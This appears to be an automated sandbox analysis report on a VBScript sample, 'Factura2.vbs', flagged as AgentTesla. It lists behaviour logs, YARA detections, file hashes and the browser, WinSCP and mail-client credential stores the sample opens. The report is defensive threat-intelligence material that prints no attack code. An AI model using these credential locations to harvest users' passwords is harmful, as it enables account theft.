Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\newfile\newfile.exe

Code function: 12_2_00383675 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

12_2_00383675

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected AgentTesla

Source: Yara match	File source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected AgentTesla

Source: Yara match	File source: 0000000A.00000002.3362357592.00000000245A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3362357592.0000000024551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

ID:	1427893
Product:	CloudBasic
Start time:	10:10:08
Start date:	18.04.2024
Sample:	Factura2.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	9500105068ac091471491a1a7c9065c2
SHA1:	f92e6b13cd0ae67dccebdcbbcdc5634a1c66aae8
SHA256:	ebfb38c8313f04d9afc3223ef7d30908d98880d333bff470da280d472b3cc836
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	29F65BA8E88C063813CC50A4EA544E93	05A7040D5C127E68C25D81CC51271FFB8BEF3568	1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	E7223244A0990B7F57AE1E7FB56F5148	105DB4D243B5424857784FCF2FA6DD395B017B68	668400C568216B8AD3AE9318031885DDB40C12E1A7C5A6E6D15AA63F1975059E
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	C7F7A26360E678A83AFAB85054B538EA	B9C885922370EE7573E7C8CF0DDB8D97B7F6F022	C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	F23953D4A58E404FCB67ADD0C45EB27A	2D75B5CACF2916C66E440F19F6B3B21DFD289340	16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b4jeyehg.lfb.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gg0c4grn.x0c.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxhyeiht.4sr.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r1qfwglr.siy.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Merogastrula.Bes	ASCII text, with very long lines (65536), with no line terminators	B87615809283894248FD746A584E882A	A59B42A75AC0530FCFFEB06E182A22BDC502B0A2	4928CBD912FE97D2A6EC89742281AAFECCA616404D2B38AF09F4A389D58608CD
C:\Users\user\AppData\Roaming\newfile\newfile.exe	PE32 executable (GUI) Intel 80386, for MS Windows	251E51E2FEDCE8BB82763D39D631EF89	677A3566789D4DA5459A1ECD01A297C261A133A2	2682086ACE1970D5573F971669591B731F87D749406927BD7A7A4B58C3C662E9

Windows Analysis Report
Factura2.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report Factura2.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Factura2.vbs

Malware Threat Intel
Provided by